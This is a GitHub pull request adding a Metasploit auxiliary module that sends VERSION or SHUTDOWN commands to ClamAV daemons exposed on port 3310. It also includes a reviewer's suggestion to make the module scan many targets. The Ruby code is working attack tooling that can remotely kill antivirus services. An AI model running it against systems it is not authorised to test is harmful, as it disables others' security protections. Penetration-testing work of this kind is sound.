Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ClamAV Remote Command Transmitter #6980

Merged
merged 9 commits into from
Jun 22, 2016
56 changes: 56 additions & 0 deletions modules/auxiliary/admin/misc/clamav_control.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It would be great to see this utilize Msf::Auxiliary::Scanner so you can more easily run this against larger swaths of targets without additional work.

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ClamAV Remote Command Transmitter',
'Description' => %q(
In certain configurations, ClamAV will bind to all addresses and listen for commands.
This module sends properly-formatted commands to the ClamAV daemon if it is in such a
configuration.
),
'Author' => [
'Alejandro Hdeza', # DISCOVER
'bwatters-r7', # MODULE
'wvu' # GUIDANCE
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ],
[ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]
],
'DisclosureDate' => 'Jun 8 2016',
'Actions' => [
[ 'VERSION', 'Description' => 'Get Version Information' ],
[ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]
],
'DefaultAction' => 'VERSION'
)
)
register_options([
Opt::RPORT(3310)
], self.class)
end

def run
begin
connect
sock.put(action.name + "\n")
print_good(sock.get_once)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
rescue EOFError
print_good('Successfully shut down ClamAV Service')
ensure
disconnect
end
end
end